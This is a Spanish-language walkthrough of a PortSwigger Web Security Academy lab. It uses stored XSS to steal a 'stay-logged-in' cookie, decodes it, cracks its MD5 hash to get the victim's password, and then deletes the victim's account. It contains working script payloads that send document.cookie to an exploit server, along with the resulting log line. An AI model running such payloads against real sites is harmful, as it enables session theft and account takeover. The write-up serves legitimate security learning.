🦋Laboratorio: Offline password cracking

• Significa que en cierta forma debemos realizar el ataque XSS para extraer alguna información importante y luego de ello con la cookie que obtengamos stay-logged-in podemos ver si sirve e intentar descifrar la password.

Intentar comprender el Request →

• Con esto podemos empezar a darnos una idea de la cookie y ver donde podria estar para analizarla e intentar descifrarla.

• Vemos que la solicitud tiene la cookie stay-logged-in.

Vamos a ver como descifrar la Cookie →

• primero vemos que tiene la estructura wiener:51dc30ddc473d43a6011e9ebba6ca770 , decodificado a base64, con eso ya tendriamos una parte, nos faltaría el hash despues de los “:”

Analizando el hash descifrado:

• Fuimos a una simple pagina de descifrado hash MD5, y esto fue lo que nos descifró:

En burp intruder dejamos la cookie así y cambiamos id=wiener a id=carlos, ya solo queda modificar el payload.

Vamos a ver.

Y pillamos a ver si matcheamos la busqueda de la response por la que nos muestre el Delete account.

Vimos que el ataque no era directamente como el anterior laboratorio, tenemos que integrar un poco el XSS dentro del exploit server, que aparece en la pagina.

<script>alert(document.location)</script>

<script>
fetch(‘https://exploit-0a8c008a03da770bc09ca69d015400e1.web-security-academy.net/' + document.cookie, {
method: ‘GET’
});
</script>

Ahí está.

Tuvimos el alert, lo cual nos indica que es vulnerable a XSS.

¿Qué es Document.location?

 <script>document.location='//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/'+document.cookie</script>
 <script>document.location='https://exploit-0afb00d90315aef2814c5b9e01ce0067.exploit-server.net/'+document.cookie</script>

La ultima petición el GET, ahí nos indica algo clave, ahí está, es la cookie stay-logged-in jajajajs podrá ser esa ¿? vamos a ver:

Ahí está mas claro, es obvio lo que hay y lo que debemos hacer, vemos que interpreta la url pero también las cookies que tiene la pagina, hay una llamada secret, y tiene esa codificación vamos a copiarla y a ver que hay.

10.0.3.174 2023-10-20 16:17:57 +0000 "GET /secret=Ynj7HKUoFkCwiMZ7A6sA00IgLkzglMMX;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz HTTP/1.1" 404 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"

• secret=Ynj7HKUoFkCwiMZ7A6sA00IgLkzglMMX: Por el momento está cookie no nos muestra nada, la probamos decodificandola en BASE64 y MD5 pero ninguna de las dos nos muestra información correspondiente.

• stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz : Esta si huevon, pille pues, decodificamos el base64 y luego el hash MD5.

Y pillamos que el hash luego de carlos tiene la estructura de un hash MD5 tal cual

• carlos:26323c16d5f4dabff3bb136f2460a943

Carlos → Username

onceuponatime → Password

Borramos la cuenta :)

Eureka! we’ve solved the Lab. :)